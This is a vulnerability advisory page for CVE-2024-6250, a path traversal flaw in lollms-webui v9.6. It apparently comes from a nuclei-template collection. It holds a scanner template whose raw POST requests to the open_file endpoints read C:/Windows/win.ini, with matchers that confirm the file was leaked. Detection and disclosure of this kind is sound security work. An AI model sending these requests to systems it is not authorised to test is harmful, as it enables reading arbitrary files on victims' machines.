LOLLMS WebUI - Absolute Path Traversal
CVE-2024-6250
Verified
Description
An absolute path traversal vulnerability exists in parisneo/lollms-webui v9.6, specifically in the open_file endpoint of lollms_advanced.py. The sanitize_path function with allow_absolute_path=True allows an attacker to access arbitrary files and directories on a Windows system. This vulnerability can be exploited to read any file and list arbitrary directories on the affected system.
Severity
High
CVSS Score
7.5
Exploit Probability
2%
Affected Product
lollms_web_ui
Published Date
January 28, 2026
Template Author
ritikchaddha
CVE-2024-6250.yaml
id: CVE-2024-6250
info:
name: LOLLMS WebUI - Absolute Path Traversal
author: ritikchaddha
severity: high
description: |
An absolute path traversal vulnerability exists in parisneo/lollms-webui v9.6, specifically in the open_file endpoint of lollms_advanced.py. The sanitize_path function with allow_absolute_path=True allows an attacker to access arbitrary files and directories on a Windows system. This vulnerability can be exploited to read any file and list arbitrary directories on the affected system.
impact: |
Attackers can read arbitrary files and list directories, leading to information disclosure and potential further exploitation.
remediation: |
Update to the latest version where the vulnerability is fixed or modify the `sanitize_path` function to disallow absolute paths.
reference:
- https://huntr.com/bounties/11a8bf9d-16f3-49b3-b5fc-ad36d8993c73
- https://nvd.nist.gov/vuln/detail/CVE-2024-6250
- https://github.com/parisneo/lollms-webui
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-6250
epss-score: 0.01957
epss-percentile: 0.77879
cwe-id: CWE-36
metadata:
verified: false
max-request: 2
vendor: lollms
product: lollms_web_ui
tags: cve,cve2024,lollms,lfi,traversal,ai,vkev
http:
- raw:
- |
POST /open_file HTTP/1.1
Host: {{Hostname}}
{"path": "C:/Windows/win.ini"}
- |
POST /api/open_file HTTP/1.1
Host: {{Hostname}}
{"path": "C:/Windows/win.ini"}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "bit app support", "[fonts]", "[extensions]")'
- 'contains(content_type, "text/plain")'
- "status_code == 200"
condition: and
# digest: 490a0046304402204eb68b7f0a7bee49dfa8e8cfeae3269914a0c944dfc926614a8e68e2fc261b3d0220056f4d1bfec19aebbdb916dac157bbae1bfeee9f61f69d4b924d9c3ed9b7878b:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-6250
CWE ID:
cwe-36
Remediation Steps
Update to the latest version where the vulnerability is fixed or modify the `sanitize_path` function to disallow absolute paths.